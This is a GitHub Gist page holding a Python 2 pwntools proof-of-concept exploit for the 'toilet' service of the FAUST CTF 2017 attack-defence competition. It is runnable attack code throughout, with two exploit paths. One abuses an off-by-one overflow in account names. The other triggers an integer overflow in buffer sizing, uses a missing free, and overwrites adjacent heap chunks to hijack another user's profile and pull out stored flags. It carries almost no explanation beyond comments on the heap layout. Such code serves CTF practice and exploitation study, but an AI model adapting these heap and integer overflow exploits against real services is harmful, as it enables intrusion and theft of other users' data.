-
-
Save waywardsun/8cf98e868d47c57acfcef51cee3c4978 to your computer and use it in GitHub Desktop.
POC exploit for toilet service of FAUST-CTF-2017
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python2 | |
from pwn import * | |
from re import findall | |
from random import choice, randint | |
from string import digits, ascii_uppercase | |
from hashlib import sha256 | |
from sys import argv, exit | |
MAX_NAME_LEN = 64 | |
LOG_ELEMENT_SIZE = 0x70 | |
#load_addr = 0x402000 # local | |
load_addr = 0x403000 # remote | |
def print_usage(argv): | |
print "Usage: {} <exploit_type> <ip-address>".format(argv[0]) | |
print "exploit_type:" | |
print "\t- off-by-one: Off by one error in account creation" | |
print "\t- integer-overflow: Integer overflow when calculating note buffer" | |
class ToiletExploit(): | |
def __init__(self, ip): | |
self._ip = ip | |
self._port = 5743 | |
self.TIMEOUT = 20 | |
self.NOTWORKING = 21 | |
def off_by_one(self): | |
s = self.connect() | |
if s is None: | |
log.error("Connection error") | |
sys.exit(1) | |
""" | |
Get log entries | |
""" | |
log.info("Dumping log") | |
log_entries = self.get_log_entries(s, self.get_log(s)) | |
log.info("Number of log entries found: {}".format(len(log_entries))) | |
flags = [] | |
# entries go from new to old | |
for log_entry in log_entries: | |
""" | |
Overflow flush function | |
""" | |
name = "B"*(MAX_NAME_LEN) | |
if self.login(s, name) is None: | |
log.error("Login error") | |
sys.exit(1) | |
if self.drop_load(s, "toomuch", log_entry) is None: | |
continue | |
""" | |
Change account by triggering loadProfile | |
""" | |
if self.flush(s) is None: | |
continue | |
log.success("Logged in as {}".format(log_entry)) | |
""" | |
Search flag | |
""" | |
settings = self.get_settings(s) | |
if settings is None: | |
continue | |
name = self.get_name(settings) | |
if name is None: | |
continue | |
flag = self.find_flag(name) | |
if flag: | |
flags.append(flag) | |
if self.logout_store(s) is None: | |
log.error("Logout error") | |
sys.exit(1) | |
self.exit(s) | |
return flags | |
def integer_overflow(self): | |
s = self.connect() | |
name = self.genRandString(10); | |
if s is None: | |
log.error("Connection error") | |
sys.exit(1) | |
""" | |
Get current log entries | |
""" | |
log_entries = self.get_log_entries(s, self.get_log(s)) | |
self.exit(s) | |
s.close() | |
flags = [] | |
for entry in log_entries: | |
flag = self.overflow_profile(entry) | |
if flag: | |
flags.append(flag) | |
return flags | |
def overflow_profile(self, entry): | |
s = self.connect() | |
name = self.genRandString(10); | |
""" | |
Create first heap-chunk | |
| Profile(0x70) | .... | |
""" | |
if self.login(s, name) is None: | |
log.error("Login error") | |
s.close() | |
return None | |
""" | |
Create second and third heap-chunk | |
| Profile(0x70) | Drop_load(0x20) | Log_Entry(0x70) | .... | |
""" | |
chunk_size = self.drop_load_overflow(s, "notimportant") | |
if chunk_size is None: | |
log.error("Drop error") | |
s.close() | |
return None | |
""" | |
Free second heap-chunk | |
| Profile(0x70) | Free(0x20) | Log_Entry(0x70) | .... | |
""" | |
if self.flush(s) is None: | |
log.error("Flush error") | |
return None | |
""" | |
Use missing free in the logout function | |
""" | |
if self.logout_discard(s) is None: | |
log.error("Logout error") | |
s.close() | |
return None | |
""" | |
Create fourth heap-chunk | |
| Profile(0x70) | Free(0x20) | Log_Entry(0x70) | Profile2(0x70) |.... | |
""" | |
if self.login(s, name) is None: | |
log.error("Login error") | |
s.close() | |
return None | |
""" | |
Allocate second heap-chunk and overflow Log_Entry and Profile2 | |
| Profile(0x70) | Drop_Load(0x20) | Overflow -> (Log_Entry(0x70)) | (Profile2(0x70)) |.... | |
""" | |
payload = entry + "\x00"*(chunk_size+LOG_ELEMENT_SIZE+MAX_NAME_LEN-(len(entry))) + p64(load_addr) | |
chunk_size2 = self.drop_load_overflow(s, payload) | |
log.info("Allocated block before Profile") | |
""" | |
Switch Account to entry | |
""" | |
if self.flush(s) is None: | |
return None | |
log.success("Logged in as {}".format(entry)) | |
""" | |
Leak potential flag | |
""" | |
settings = self.get_settings(s) | |
if settings is None: | |
s.close() | |
return None | |
name = self.get_name(settings) | |
if name is None: | |
s.close() | |
return None | |
flag = self.find_flag(name) | |
self.exit(s) | |
s.close() | |
return flag | |
def genRandString(self, N): | |
return ''.join(choice(ascii_uppercase + digits) for _ in range(N)) | |
def connect(self): | |
try: | |
s = remote(self._ip, self._port) | |
except: | |
return None | |
if self.read_menu(s) is None: | |
return None | |
return s | |
def read_menu(self, s): | |
return s.recvuntil("Your choice: ") | |
def login(self, s, name): | |
s.sendline('1') | |
if s.recvuntil('Please give me your name: ') is None: | |
return None | |
s.sendline(name) | |
if self.read_menu(s) is None: | |
return None | |
return 1 | |
def change_seat_temp(self, s, temp): | |
s.sendline('2') | |
if s.recvuntil('Please give me the new temperature: ') is None: | |
return None | |
s.sendline(str(temp)) | |
resp = s.recvlines(2)[1] | |
if self.read_menu(s) is None: | |
return None | |
if "Algright, let me arrange that for you." not in resp.decode('utf-8'): | |
return None | |
return 1 | |
def change_flush_func(self, s, choice): | |
s.sendline('3') | |
if s.recvuntil('Your choice: ') is None: | |
return None | |
s.sendline(str(choice)) | |
resp = s.recvlines(2)[1] | |
if self.read_menu(s) is None: | |
return None | |
if "Something went wrong, please try again!" in resp.decode('utf-8'): | |
return None | |
return 1 | |
def get_settings(self, s): | |
s.sendline('4') | |
ret = s.recvuntil('1. Login') | |
if self.read_menu(s) is None: | |
return None | |
return ret | |
def get_id(self, text): | |
if text is None: | |
return None | |
hits = findall(r'ID: (\d*)', text.decode('utf-8')) | |
if not hits: | |
return None | |
return hits[0] | |
def get_name(self, text): | |
if text is None: | |
return None | |
hits = findall(r'Name: ([\w+_/]*)', text.decode('utf-8')) | |
if not hits: | |
return None | |
return hits[0] | |
def get_temp(self, text): | |
if text is None: | |
return None | |
hits = findall(r'Seat temperature: (\d*)', text.decode('utf-8')) | |
if not hits: | |
return None | |
return hits[0] | |
def drop_load(self, s, cons, content): | |
s.sendline('5') | |
tmp = s.recvuntil('load weights ') | |
tmp = s.recvline() | |
hits = findall(r'(\d*)g', tmp.decode('utf-8')) | |
weight = hits[0] | |
ret = s.recvuntil('the consistency:') | |
if not ret: | |
return None | |
s.sendline(cons) | |
ret = s.recvline() | |
if not ret: | |
return None | |
s.sendline(content) | |
if self.read_menu(s) is None: | |
return None | |
return weight | |
def drop_load_overflow(self, s, content): | |
s.sendline('5') | |
tmp = s.recvuntil('load weights ') | |
tmp = s.recvline() | |
hits = findall(r'(\d*)g', tmp.decode('utf-8')) | |
weight = int(hits[0], 10) | |
ret = s.recvuntil('the consistency:') | |
if not ret: | |
return None | |
cons, cons_word = self.calc_cons(weight) | |
if cons is None: | |
return None | |
chunk_size = self.calc_chunk_size((weight*100+cons*10)%(2**16)) | |
s.send(cons_word) | |
ret = s.recvline() | |
if not ret: | |
return None | |
s.sendline(content) | |
if self.read_menu(s) is None: | |
return None | |
s.clean() | |
return chunk_size | |
def calc_cons(self, weight): | |
max_val = 2**16 | |
cons = 1 | |
""" | |
Make sure buffer is too small for a Profile | |
""" | |
cons = (max_val-(weight*100)+0x50)/10 | |
remaining = cons | |
cons_word = "" | |
while remaining > 0x7e: | |
cons_word += chr(0x7e) | |
remaining -= 0x7e | |
if remaining < 0x20: | |
cons_word = cons_word[:-1] + chr(0x5e) + chr(remaining+0x20) | |
else: | |
cons_word += chr(remaining) | |
cons_word += "\n" | |
if len(cons_word) > 30: | |
return None, None | |
return cons, cons_word | |
def calc_chunk_size(self, cons): | |
if cons < 0x19: | |
return 0x20 | |
if cons < 0x29: | |
return 0x30 | |
if cons < 0x39: | |
return 0x40 | |
if cons < 0x49: | |
return 0x50 | |
if cons < 0x59: | |
return 0x60 | |
if cons < 0x69: | |
return 0x70 | |
if cons < 0x79: | |
return 0x80 | |
def show_latest_notes(self, s): | |
s.sendline('6') | |
ret = s.recvlines(2)[1] | |
if "Here are your notes:" not in ret.decode('utf-8'): | |
self.read_menu(s) | |
return None | |
notes = s.recvline() | |
if not notes: | |
return None | |
if self.read_menu(s) is None: | |
return None | |
return notes | |
def flush(self, s): | |
s.sendline('7') | |
ret = s.recvuntil('1. Login') | |
if ret is not None and b'Going to flush now' not in ret: | |
return None | |
self.read_menu(s) | |
return 1 | |
def get_log(self, s): | |
s.sendline('8') | |
ret = s.recvuntil('1. Login') | |
if self.read_menu(s) is None: | |
return None | |
return ret | |
def get_log_entries(self, s, log): | |
lines = log.decode('utf-8').split('\n') | |
entries = [] | |
for line in lines: | |
log_id = self.get_log_id(s, line) | |
if log_id: | |
entries.append(log_id) | |
return entries | |
def get_log_id(self, s, line): | |
hits = findall(r'#==== ([\da-f]*) ==== | ==== [\d:]* ====#', line) | |
if not hits: | |
return None | |
return hits[0] | |
def find_log_entry(self, s, log, profile_id): | |
entries = get_log_entries(s, log) | |
for entry in entries: | |
if profile_id == get_log_id(entry).lstrip("0"): | |
return True | |
return False | |
def logout_store(self, s): | |
s.sendline('9') | |
s.recvline() | |
s.sendline('y') | |
ret = s.recvuntil('1. Login') | |
if ret is None or b'Hope you feel relieved now! Come back soon!' not in ret: | |
return None | |
self.read_menu(s) | |
return 1 | |
def logout_discard(self, s): | |
s.sendline('9') | |
s.recvline() | |
s.sendline('n') | |
self.read_menu(s) | |
return 1 | |
def exit(self, s): | |
s.sendline('10') | |
return 1 | |
def find_flag(self, line): | |
hits = findall(r'FAUST_[A-Za-z0-9/\+]{32}', line) | |
if not hits: | |
return None | |
else: | |
return hits[0] | |
if len(argv) < 3: | |
print_usage(argv) | |
exit(1) | |
#context.clear(log_level='debug') | |
exploit = ToiletExploit(argv[2]) | |
if argv[1] == "off-by-one": | |
flags = exploit.off_by_one() | |
elif argv[1] == "integer-overflow": | |
flags = exploit.integer_overflow() | |
if len(flags) > 0: | |
print "Here are your flags:" | |
for flag in flags: | |
print flag | |
else: | |
print "No flags were found!" | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment